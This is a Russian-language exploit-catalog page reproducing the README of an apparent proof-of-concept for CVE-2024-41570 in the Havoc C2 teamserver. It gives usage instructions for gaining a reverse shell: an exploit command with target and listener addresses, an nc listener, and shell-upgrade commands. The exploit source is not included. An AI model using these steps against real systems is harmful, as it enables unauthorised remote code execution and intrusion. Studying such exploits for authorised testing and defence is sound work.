Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-41570 — Автоматизированный эксплойт Reverse Shell через WebSocket | Havoc-C2-SSRF с RCE | Kitploit
Инструменты/GitHubGitHub/diemoeve/cve-2024-41570
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed TeamingИнструмент Удаленного Доступа
GitHubdiemoeve/cve-2024-41570

CVE-2024-41570

Автоматизированный эксплойт Reverse Shell через WebSocket | Havoc-C2-SSRF с RCE

122181 год назадЕщё не проверено
Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-41570 | Havoc C2 SSRF с RCE | Автоматизированный эксплойт Reverse Shell через WebSocket

Этот проект содержит proof-of-concept (PoC) скрипт на Python для эксплуатации уязвимого сервиса на основе WebSocket. Скрипт автоматизирует регистрацию агента, доставку WebSocket-пейлоада и удалённое выполнение команд для установления обратной оболочки (reverse shell).

Возможности

  • Регистрирует агента в целевом сервисе.
  • Открывает WebSocket и отправляет пейлоады рукопожатия (handshake) и аутентификации.
  • Выполняет команды удалённо через обратную оболочку (reverse shell).
  • Предоставляет пошаговый процесс с понятными инструкциями.

Предварительные требования

  • Python 3.x, установленный на вашей машине.
  • Установите необходимые зависимости, выполнив:
    pip install -r requirements.txt
    

Установка

  1. Клонируйте этот репозиторий:
    git clone https://github.com/kit4py/CVE-2024-41570.git
    
  2. Перейдите в каталог проекта:
    cd CVE-2024-41570
    
  3. Установите зависимости:
    pip install -r requirements.txt
    

Использование

Запустите скрипт с необходимыми аргументами:

python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>

Аргументы

  • -t: Целевой URL WebSocket-сервера.
  • -i: IP-адрес Team Server из Havoc.
  • -p: Порт Team Server из Havoc.
  • -U: Имя пользователя для аутентификации WebSocket.
  • -P: Пароль для аутентификации WebSocket.
  • -l: IP-адрес слушателя (listener) для обратной оболочки (ваша машина).
  • -L: Порт слушателя (listener) для обратной оболочки (ваша машина).

Пример команды

python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444

Шаги выполнения

  1. Убедитесь, что целевой сервис запущен и уязвим.
  2. Запустите скрипт с необходимыми параметрами.
  3. В отдельном терминале запустите слушатель (listener):
    nc -lvnp <listener_port>
    
  4. Улучшите оболочку (upgrade shell):
    python -c 'import pty; pty.spawn("/bin/bash")' 
    export TERM=xterm-256color
    stty rows 67 columns 318
    

Зависимости

Скрипт требует следующие библиотеки Python:

  • requests
  • pycryptodome

Установите их с помощью команды:

pip install -r requirements.txt

Уведомление о безопасности

Этот скрипт предназначен только для образовательных целей. Убедитесь, что у вас есть явное разрешение на тестирование целевой системы. Неправильное использование этого скрипта может нарушить законы и этические нормы.

Ссылки

Вдохновлено Default Havoc Poc

Вклад в проект

Вклад приветствуется! Не стесняйтесь форкать репозиторий и отправлять pull request.

Лицензия

Этот проект распространяется под лицензией MIT. Подробности см. в файле LICENSE.

Скачать инструмент